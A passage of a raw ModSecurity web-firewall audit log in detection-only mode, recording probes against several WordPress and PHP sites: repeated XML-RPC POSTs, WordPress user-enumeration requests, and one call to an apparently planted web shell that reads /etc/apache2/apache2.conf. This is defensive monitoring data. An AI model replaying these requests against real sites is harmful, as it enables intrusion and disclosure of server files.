[hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE7_hvVluSm0zKldlXc3cQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007686051792 327277 (- - -) Stopwatch2: 1750007686051792 327277; combined=2222, p1=378, p2=1482, p3=61, p4=38, p5=164, sr=109, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d48a1c39-Z-- --08399834-A-- [15/Jun/2025:22:44:51.741212 +0530] aE7_i_VluSm0zKldlXc3dAAAAAA 124.109.12.110 50428 127.0.0.1 7081 --08399834-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --08399834-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --08399834-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE7_i_VluSm0zKldlXc3dAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007691436870 304401 (- - -) Stopwatch2: 1750007691436870 304401; combined=1912, p1=276, p2=1186, p3=68, p4=116, p5=166, sr=76, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --08399834-Z-- --f3184604-A-- [15/Jun/2025:22:45:06.809319 +0530] aE7_mQZ37L8e68IeSGntYwAAAAo 128.199.112.101 38142 127.0.0.1 7081 --f3184604-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 497 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f3184604-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f3184604-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7_mQZ37L8e68IeSGntYwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007705810735 998643 (- - -) Stopwatch2: 1750007705810735 998643; combined=3058, p1=532, p2=2107, p3=49, p4=70, p5=184, sr=152, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f3184604-Z-- --8270440c-A-- [15/Jun/2025:22:45:48.060842 +0530] aE7_w5K-05zbifgH_rQLLQAAAAU 183.56.195.106 33006 127.0.0.1 7081 --8270440c-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --8270440c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --8270440c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (38+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (38+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE7_w5K-05zbifgH_rQLLQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007747775263 285642 (- - -) Stopwatch2: 1750007747775263 285642; combined=2105, p1=344, p2=1376, p3=71, p4=43, p5=171, sr=92, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8270440c-Z-- --e76ae710-A-- [15/Jun/2025:22:45:54.220992 +0530] aE7_yRLQPChAjmM6-0i8jwAAAAQ 124.109.12.110 43608 127.0.0.1 7081 --e76ae710-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e76ae710-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --e76ae710-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE7_yRLQPChAjmM6-0i8jwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007753904768 316307 (- - -) Stopwatch2: 1750007753904768 316307; combined=2482, p1=402, p2=1590, p3=80, p4=60, p5=220, sr=103, sw=130, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e76ae710-Z-- --21111568-A-- [15/Jun/2025:22:46:06.925387 +0530] aE7_1fVluSm0zKldlXc3nwAAAAA 128.199.112.101 44504 127.0.0.1 7081 --21111568-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 506 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --21111568-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --21111568-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7_1fVluSm0zKldlXc3nwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007765940118 985325 (- - -) Stopwatch2: 1750007765940118 985325; combined=2445, p1=432, p2=1620, p3=51, p4=73, p5=168, sr=138, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --21111568-Z-- --1c9c617d-A-- [15/Jun/2025:22:46:37.517337 +0530] aE7_9DtuDRGAAnNiXIekPAAAAAg 99.234.79.248 57638 127.0.0.1 7081 --1c9c617d-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 99.234.79.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 380 accept-language: en-US,en;q=0.5 content-type: text/plain;charset=UTF-8 origin: https://www.retaxis.com user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.1397.1742 Mobile Safari/537.36 accept: */* sec-fetch-site: same-origin sec-fetch-mode: cors sec-fetch-dest: empty referer: https://www.retaxis.com/ accept-encoding: gzip, deflate, br cookie: _sfs_id=7b4ef6e3233b2d102025a9e4e3d823b81750007785; _fbp=fb.1.1750007795966.105680678124479074 --1c9c617d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: PHPSESSID=hditpl1pro4i7clmv4g5kpsm43; expires=Sat, 13 Sep 2025 17:16:37 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --1c9c617d-E-- --1c9c617d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE7_9DtuDRGAAnNiXIekPAAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE7_9DtuDRGAAnNiXIekPAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007796233060 1284375 (- - -) Stopwatch2: 1750007796233060 1284375; combined=3558, p1=522, p2=2780, p3=110, p4=33, p5=112, sr=102, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1c9c617d-Z-- --cf0aec12-A-- [15/Jun/2025:22:46:48.605284 +0530] aE8AAJK-05zbifgH_rQLZAAAAAU 183.56.195.106 39694 127.0.0.1 7081 --cf0aec12-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --cf0aec12-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --cf0aec12-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (45+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (45+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8AAJK-05zbifgH_rQLZAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007808317025 288321 (- - -) Stopwatch2: 1750007808317025 288321; combined=1999, p1=360, p2=1285, p3=67, p4=37, p5=156, sr=106, sw=94, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf0aec12-Z-- --b17bdf28-A-- [15/Jun/2025:22:47:07.097128 +0530] aE8AEmCPauOs0aEe3c0-WQAAAAI 128.199.112.101 59188 127.0.0.1 7081 --b17bdf28-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 495 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b17bdf28-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b17bdf28-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8AEmCPauOs0aEe3c0-WQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007826117523 979661 (- - -) Stopwatch2: 1750007826117523 979661; combined=2108, p1=411, p2=1380, p3=33, p4=48, p5=150, sr=95, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b17bdf28-Z-- --449df174-A-- [15/Jun/2025:22:47:13.059306 +0530] aE8AF_VluSm0zKldlXc37AAAAAA 181.196.147.86 42186 127.0.0.1 7081 --449df174-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 181.196.147.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --449df174-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --449df174-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8AF_VluSm0zKldlXc37AAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007831967787 1091598 (- - -) Stopwatch2: 1750007831967787 1091598; combined=2213, p1=378, p2=1732, p3=0, p4=0, p5=102, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --449df174-Z-- --5526480b-A-- [15/Jun/2025:22:47:19.884270 +0530] aE8AHxLQPChAjmM6-0i87gAAAAQ 50.19.221.48 35384 127.0.0.1 7081 --5526480b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apache2&viewfile=//etc/apache2/apache2.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 50.19.221.48 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --5526480b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 6053 Connection: close Content-Type: text/html; charset=UTF-8 --5526480b-H-- Message: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /etc/apache2/apache2.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/apache2.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/apache2.conf found within ARGS:viewfile: /etc/apache2/apache2.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE8AHxLQPChAjmM6-0i87gAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1750007839879535 4788 (- - -) Stopwatch2: 1750007839879535 4788; combined=2268, p1=339, p2=1790, p3=36, p4=46, p5=57, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5526480b-Z-- --b350bb43-A-- [15/Jun/2025:22:47:24.265647 +0530] aE8AI759833JshVCMq_fiwAAAAY 179.189.233.174 36002 127.0.0.1 7081 --b350bb43-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 179.189.233.174 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b350bb43-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --b350bb43-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8AI759833JshVCMq_fiwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007843312998 952725 (- - -) Stopwatch2: 1750007843312998 952725; combined=1977, p1=334, p2=1518, p3=0, p4=0, p5=124, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b350bb43-Z-- --e7e7c90f-A-- [15/Jun/2025:22:47:37.460014 +0530] aE8AMGCPauOs0aEe3c0-cAAAAAI 168.121.179.248 55772 127.0.0.1 7081 --e7e7c90f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 168.121.179.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e7e7c90f-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --e7e7c90f-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE8AMGCPauOs0aEe3c0-cAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750007856382962 1077155 (- - -) Stopwatch2: 1750007856382962 1077155; combined=1978, p1=344, p2=1523, p3=0, p4=0, p5=110, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e7e7c90f-Z-- --dd548706-A-- [15/Jun/2025:22:47:49.813685 +0530] 